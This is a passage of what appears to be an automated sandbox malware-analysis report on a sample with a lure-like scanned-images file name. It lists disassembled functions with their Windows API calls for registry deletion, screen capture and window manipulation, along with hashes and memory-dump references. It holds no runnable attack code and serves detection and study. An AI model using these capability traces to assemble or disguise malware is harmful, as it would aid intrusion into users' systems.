                                                                                  • Part of subcall function 004DC998: _wcslen.LIBCMT ref: 004DCA68
                                                                                  • Part of subcall function 004DC998: _wcslen.LIBCMT ref: 004DCA9E
                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004DB6F4
                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004DB772
                                                                                • RegDeleteValueW.ADVAPI32(?,?), ref: 004DB80A
                                                                                • RegCloseKey.ADVAPI32(?), ref: 004DB87E
                                                                                • RegCloseKey.ADVAPI32(?), ref: 004DB89C
                                                                                • LoadLibraryA.KERNEL32(advapi32.dll), ref: 004DB8F2
                                                                                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 004DB904
                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 004DB922
                                                                                • FreeLibrary.KERNEL32(00000000), ref: 004DB983
                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 004DB994
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                • API String ID: 146587525-4033151799
                                                                                • Opcode ID: 18ff1f9cd202343d6426907941e076986433c716c22bf0960b43ee56688ddeac
                                                                                • Instruction ID: e1e3191414202a2475e080c6d73527ed6df1b542afcf31b6ecc65070481f51ab
                                                                                • Opcode Fuzzy Hash: 18ff1f9cd202343d6426907941e076986433c716c22bf0960b43ee56688ddeac
                                                                                • Instruction Fuzzy Hash: 9DC17B74204241EFD710DF15C4A4B2ABBE5EF84318F15859EF89A4B3A2CB39EC46CB95
                                                                                Function 004D255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetDC.USER32(00000000), ref: 004D25D8
                                                                                • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 004D25E8
                                                                                • CreateCompatibleDC.GDI32(?), ref: 004D25F4
                                                                                • SelectObject.GDI32(00000000,?), ref: 004D2601
                                                                                • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 004D266D
                                                                                • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 004D26AC
                                                                                • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 004D26D0
                                                                                • SelectObject.GDI32(?,?), ref: 004D26D8
                                                                                • DeleteObject.GDI32(?), ref: 004D26E1
                                                                                • DeleteDC.GDI32(?), ref: 004D26E8
                                                                                • ReleaseDC.USER32(00000000,?), ref: 004D26F3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                • String ID: (
                                                                                • API String ID: 2598888154-3887548279
                                                                                • Opcode ID: e52e226ee292ec9dcd5a4cbee068d6451cc4a1e8de6b41a830cac3865e655ffa
                                                                                • Instruction ID: 95b1bfdaa0941f0468d7edc68daa9603f919164464a18dfcc25b5264e4bf3d22
                                                                                • Opcode Fuzzy Hash: e52e226ee292ec9dcd5a4cbee068d6451cc4a1e8de6b41a830cac3865e655ffa
                                                                                • Instruction Fuzzy Hash: 8B61F175D00219EFCF04CFA8D984AAEBBB5FF48310F20852AE955A7351D774A942CFA4
                                                                                Function 0048DA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ___free_lconv_mon.LIBCMT ref: 0048DAA1
                                                                                  • Part of subcall function 0048D63C: _free.LIBCMT ref: 0048D659
                                                                                  • Part of subcall function 0048D63C: _free.LIBCMT ref: 0048D66B
                                                                                  • Part of subcall function 0048D63C: _free.LIBCMT ref: 0048D67D
                                                                                  • Part of subcall function 0048D63C: _free.LIBCMT ref: 0048D68F
                                                                                  • Part of subcall function 0048D63C: _free.LIBCMT ref: 0048D6A1
                                                                                  • Part of subcall function 0048D63C: _free.LIBCMT ref: 0048D6B3
                                                                                  • Part of subcall function 0048D63C: _free.LIBCMT ref: 0048D6C5
                                                                                  • Part of subcall function 0048D63C: _free.LIBCMT ref: 0048D6D7
                                                                                  • Part of subcall function 0048D63C: _free.LIBCMT ref: 0048D6E9
                                                                                  • Part of subcall function 0048D63C: _free.LIBCMT ref: 0048D6FB
                                                                                  • Part of subcall function 0048D63C: _free.LIBCMT ref: 0048D70D
                                                                                  • Part of subcall function 0048D63C: _free.LIBCMT ref: 0048D71F
                                                                                  • Part of subcall function 0048D63C: _free.LIBCMT ref: 0048D731
                                                                                • _free.LIBCMT ref: 0048DA96
                                                                                  • Part of subcall function 004829C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0048D7D1,00000000,00000000,00000000,00000000,?,0048D7F8,00000000,00000007,00000000,?,0048DBF5,00000000), ref: 004829DE
                                                                                  • Part of subcall function 004829C8: GetLastError.KERNEL32(00000000,?,0048D7D1,00000000,00000000,00000000,00000000,?,0048D7F8,00000000,00000007,00000000,?,0048DBF5,00000000,00000000), ref: 004829F0
                                                                                • _free.LIBCMT ref: 0048DAB8
                                                                                • _free.LIBCMT ref: 0048DACD
                                                                                • _free.LIBCMT ref: 0048DAD8
                                                                                • _free.LIBCMT ref: 0048DAFA
                                                                                • _free.LIBCMT ref: 0048DB0D
                                                                                • _free.LIBCMT ref: 0048DB1B
                                                                                • _free.LIBCMT ref: 0048DB26
                                                                                • _free.LIBCMT ref: 0048DB5E
                                                                                • _free.LIBCMT ref: 0048DB65
                                                                                • _free.LIBCMT ref: 0048DB82
                                                                                • _free.LIBCMT ref: 0048DB9A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                • String ID:
                                                                                • API String ID: 161543041-0
                                                                                • Opcode ID: cf489ac70dbe222929a01e916e986d0223aaf282a3da5b6b39ba732fdc59d866
                                                                                • Instruction ID: f7a547cc88f0484564f326d3785ad9d3cad5e6dfb8e3c464cf06534a17d884fd
                                                                                • Opcode Fuzzy Hash: cf489ac70dbe222929a01e916e986d0223aaf282a3da5b6b39ba732fdc59d866
                                                                                • Instruction Fuzzy Hash: 5B314CB1A452049FEB25BA3AE945B5F77E9FF00314F214C2BE449D7291DE7DAC808728
                                                                                Function 004B365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 004B369C
                                                                                • _wcslen.LIBCMT ref: 004B36A7
                                                                                • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 004B3797
                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 004B380C
                                                                                • GetDlgCtrlID.USER32(?), ref: 004B385D
                                                                                • GetWindowRect.USER32(?,?), ref: 004B3882
                                                                                • GetParent.USER32(?), ref: 004B38A0
                                                                                • ScreenToClient.USER32(00000000), ref: 004B38A7
                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 004B3921
                                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 004B395D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                                                                • String ID: %s%u
                                                                                • API String ID: 4010501982-679674701
                                                                                • Opcode ID: 8cf1ad6c6d5655805be56f652a29cfe1c8db0ef10570cedc58dab127f57b3a03
                                                                                • Instruction ID: a393ade4cd66d8a46d090f496edcd17c06b33806b2ff15418036dac41cf18256
                                                                                • Opcode Fuzzy Hash: 8cf1ad6c6d5655805be56f652a29cfe1c8db0ef10570cedc58dab127f57b3a03
                                                                                • Instruction Fuzzy Hash: DF91D471204606AFD714DF26C885BEBF7E8FF44305F00852AF999C6251DB38EA46CBA5
                                                                                Function 004B4954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 004B4994
                                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 004B49DA
                                                                                • _wcslen.LIBCMT ref: 004B49EB
                                                                                • CharUpperBuffW.USER32(?,00000000), ref: 004B49F7
                                                                                • _wcsstr.LIBVCRUNTIME ref: 004B4A2C
                                                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 004B4A64
                                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 004B4A9D
                                                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 004B4AE6
                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 004B4B20
                                                                                • GetWindowRect.USER32(?,?), ref: 004B4B8B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                • String ID: ThumbnailClass
                                                                                • API String ID: 1311036022-1241985126
                                                                                • Opcode ID: 0a88819e4095ec887ff0bc092aed0a996dcc3184f2ef4f66295a3db99f6563f1
                                                                                • Instruction ID: 0955c5679972037c7c5f13a03bf203261a001d6e5c3c661feb7cfd4a406a56a3
                                                                                • Opcode Fuzzy Hash: 0a88819e4095ec887ff0bc092aed0a996dcc3184f2ef4f66295a3db99f6563f1
                                                                                • Instruction Fuzzy Hash: B891AF710082059BDB04DF24C981BEB77A8FF84714F04846AFE859A297DB38ED45CBB9
                                                                                Function 004DCC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 004DCC64
                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 004DCC8D
                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 004DCD48
                                                                                  • Part of subcall function 004DCC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 004DCCAA
                                                                                  • Part of subcall function 004DCC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 004DCCBD
                                                                                  • Part of subcall function 004DCC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 004DCCCF
                                                                                  • Part of subcall function 004DCC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 004DCD05
                                                                                  • Part of subcall function 004DCC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 004DCD28
                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 004DCCF3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                • API String ID: 2734957052-4033151799
                                                                                • Opcode ID: 3ab3de651b65f1ce43db859dbeee3e4f1dceb9b15b94f1af9d0b365021d0a277
                                                                                • Instruction ID: 5911557346863289353d260b326ffea947af867351d033d76cdd6d523c12048a
                                                                                • Opcode Fuzzy Hash: 3ab3de651b65f1ce43db859dbeee3e4f1dceb9b15b94f1af9d0b365021d0a277
                                                                                • Instruction Fuzzy Hash: D4316071901129BBDB208B95DCD8EFFBB7CEF45750F000166F905E6341D7389A46DAA8
                                                                                Function 004C3D1E Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 004C3D40
                                                                                • _wcslen.LIBCMT ref: 004C3D6D
                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 004C3D9D
                                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 004C3DBE
                                                                                • RemoveDirectoryW.KERNEL32(?), ref: 004C3DCE
                                                                                • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 004C3E55
                                                                                • CloseHandle.KERNEL32(00000000), ref: 004C3E60
                                                                                • CloseHandle.KERNEL32(00000000), ref: 004C3E6B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                • String ID: :$\$\??\%s
                                                                                • API String ID: 1149970189-3457252023
                                                                                • Opcode ID: beb62308ad411936fef4abc7facd76bb5c99033cb7a76853dc3acb9224591075
                                                                                • Instruction ID: a626f1d4fc0c0b44e371c6a151c3c36971a1c1aea97669405042193d9e4daef3
                                                                                • Opcode Fuzzy Hash: beb62308ad411936fef4abc7facd76bb5c99033cb7a76853dc3acb9224591075
                                                                                • Instruction Fuzzy Hash: FC31A575900249ABDB209FA0DC89FEF37BCEF88705F1081BAFA09D6151E77497458B28
                                                                                Function 004BE6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • timeGetTime.WINMM ref: 004BE6B4
                                                                                  • Part of subcall function 0046E551: timeGetTime.WINMM(?,?,004BE6D4), ref: 0046E555
                                                                                • Sleep.KERNEL32(0000000A), ref: 004BE6E1
                                                                                • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 004BE705
                                                                                • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 004BE727
                                                                                • SetActiveWindow.USER32 ref: 004BE746
                                                                                • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 004BE754
                                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 004BE773
                                                                                • Sleep.KERNEL32(000000FA), ref: 004BE77E
                                                                                • IsWindow.USER32 ref: 004BE78A
                                                                                • EndDialog.USER32(00000000), ref: 004BE79B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                • String ID: BUTTON
                                                                                • API String ID: 1194449130-3405671355
                                                                                • Opcode ID: 2a74badd62ed862b2ad3b447c28fc5c9fa6845ff38bb877c869efb2024246e58
                                                                                • Instruction ID: 0bdade5f1689e200ac7f30e84b63da13c8c5a43c1d2a949e926edb403f6f9fd2
                                                                                • Opcode Fuzzy Hash: 2a74badd62ed862b2ad3b447c28fc5c9fa6845ff38bb877c869efb2024246e58
                                                                                • Instruction Fuzzy Hash: 0B219575200244BFEB105F23ECC9AA63B69FFA6349F101436F401952A2DF75AC06AB3C
                                                                                Function 004BE9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00459CB3: _wcslen.LIBCMT ref: 00459CBD
                                                                                • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 004BEA5D
                                                                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 004BEA73
                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004BEA84
                                                                                • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 004BEA96
                                                                                • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 004BEAA7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: SendString$_wcslen
                                                                                • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                • API String ID: 2420728520-1007645807
                                                                                • Opcode ID: 16203ef8d1e2b6c51dbd4f11f8023214c846cdfcaa3921e0b8ad403aa70533c5
                                                                                • Instruction ID: 655f4853511b7ea3d2aef8e1c99e9f2001c5d3251f958a37160d03255063d374
                                                                                • Opcode Fuzzy Hash: 16203ef8d1e2b6c51dbd4f11f8023214c846cdfcaa3921e0b8ad403aa70533c5
                                                                                • Instruction Fuzzy Hash: 88117331A502597AE720A7A2DC4ADFF6E7CFFD5F44F40042A7811A20D2EE741D89C5B4
                                                                                Function 004B5CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,00000001), ref: 004B5CE2
                                                                                • GetWindowRect.USER32(00000000,?), ref: 004B5CFB
                                                                                • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 004B5D59
                                                                                • GetDlgItem.USER32(?,00000002), ref: 004B5D69
                                                                                • GetWindowRect.USER32(00000000,?), ref: 004B5D7B
                                                                                • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 004B5DCF
                                                                                • GetDlgItem.USER32(?,000003E9), ref: 004B5DDD
                                                                                • GetWindowRect.USER32(00000000,?), ref: 004B5DEF
                                                                                • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 004B5E31
                                                                                • GetDlgItem.USER32(?,000003EA), ref: 004B5E44
                                                                                • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 004B5E5A
                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 004B5E67
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ItemMoveRect$Invalidate
                                                                                • String ID:
                                                                                • API String ID: 3096461208-0
                                                                                • Opcode ID: c6ec31e7a977eb2a2b186a1e4f5bd95579c016afd36e93ab3a6e58c5d74c8c78
                                                                                • Instruction ID: 61654633bf244b1e9a211e51cdb9889ae8281c41da680bf654d2d805333e13b9
                                                                                • Opcode Fuzzy Hash: c6ec31e7a977eb2a2b186a1e4f5bd95579c016afd36e93ab3a6e58c5d74c8c78
                                                                                • Instruction Fuzzy Hash: D6512F70A00605AFDF18CF68DD89AAEBBB9FB48300F148229F915E6291D7749E01CB64
                                                                                Function 00468BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00468F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00468BE8,?,00000000,?,?,?,?,00468BBA,00000000,?), ref: 00468FC5
                                                                                • DestroyWindow.USER32(?), ref: 00468C81
                                                                                • KillTimer.USER32(00000000,?,?,?,?,00468BBA,00000000,?), ref: 00468D1B
                                                                                • DestroyAcceleratorTable.USER32(00000000), ref: 004A6973
                                                                                • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00468BBA,00000000,?), ref: 004A69A1
                                                                                • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00468BBA,00000000,?), ref: 004A69B8
                                                                                • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00468BBA,00000000), ref: 004A69D4
                                                                                • DeleteObject.GDI32(00000000), ref: 004A69E6
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                • String ID:
                                                                                • API String ID: 641708696-0
                                                                                • Opcode ID: 1427c3b43a06f2604a47bc181ea033f60c3a07b09e517d2b40d320d2b0f07356
                                                                                • Instruction ID: 1a428714a1cf1f9a524ab91057f893bc559fb8fd44414da1bd82f983600f731a
                                                                                • Opcode Fuzzy Hash: 1427c3b43a06f2604a47bc181ea033f60c3a07b09e517d2b40d320d2b0f07356
                                                                                • Instruction Fuzzy Hash: 6361AB31102B00DFCB358F24C998B2777B1FF66316F14462EE0429A660DB39AC96DB5E
                                                                                Function 00469838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00469944: GetWindowLongW.USER32(?,000000EB), ref: 00469952
                                                                                • GetSysColor.USER32(0000000F), ref: 00469862
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
